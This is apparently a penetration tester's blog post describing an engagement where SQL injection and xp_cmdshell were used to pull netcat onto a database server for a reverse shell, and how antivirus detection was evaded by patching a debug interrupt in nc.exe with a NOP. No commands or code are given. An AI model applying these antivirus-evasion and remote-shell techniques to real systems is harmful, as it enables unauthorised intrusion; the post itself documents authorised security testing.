Bypassing anti-virus detection of Netcat

Ever wonder how to modify a hacking tool to evade anti-virus programs? I always understood how signature-based detection worked, but never bothered trying to bypass it during a pen-test. That's typically not something we have time to do on the fly. Besides, the only program we use that gets detected consistently is pwdump - and we got around that problem by modifying the source and recompiling it. But I recently got to use another technique that is interesting enough to share here.

It was an external pen-test: we were able to exploit SQL injection in a web application, and had the ability to run arbitrary commands on the database server through xp_cmdshell. The application was connecting to the MS SQL database with 'sa' privileges - bad move on their part. After running some test commands to verify that everything worked, we stood up a TFTP server on our pen-test build and sent a command for the compromised server to retrieve netcat so we could run a reverse shell.

We saw the file transfer successfully in our TFTP logs, but when we tried to execute netcat to connect to our listener, nothing happened. After spending an hour troubleshooting, we realized that nc.exe was never getting written to the target server's file-system after being uploaded. That's a tell-tale sign that anti-virus was eating the tool. I was a bit surprised - on our test builds neither Norton nor McAfee detect netcat, and I've never had it happen to me during other projects.

Our first instinct was to just recompile the netcat source after applying some changes, as we had done with pwdump, but we were having issues getting a development environment set up on our test system. So I set out to evade anti-virus by directly modifying the executable. First, I just changed some strings in the binary with a hex editor, but that didn't help. So I did some research and found a great writeup that details exactly how to change Netcat v 1.11 to bypass Norton Anti-Virus: Taking Back Netcat. I wasn't sure whether the target server was running Norton, but it was worth a shot. (I guess I could have just ran a 'dir' command to list the contents of "C:\Program Files" - oh well.)

The authors applied a sort of binary-search technique to isolate the code segment in netcat that was being detected by Norton. They then used a debugger (the excellent Olly) to disassemble the code and identify a portion that could be changeable without disrupting the application functionality. Turns out the code segment identified by the AV signature has a sequence of interrupts for software debugging that can be safely modified. By replacing one of those with a NOP, the binary is changed enough to evade detection, yet still works perfectly.

I repeated the steps in the whitepaper, and ended up with a patched version of nc.exe that we were able to successfully upload and run on the target server. It's a time-consuming but simple technique, and I plan on trying it out with some other tools when I get a chance. I'm sure this is nothing new to malware experts, but it was a fun little hack to pull off in the middle of a pen-test.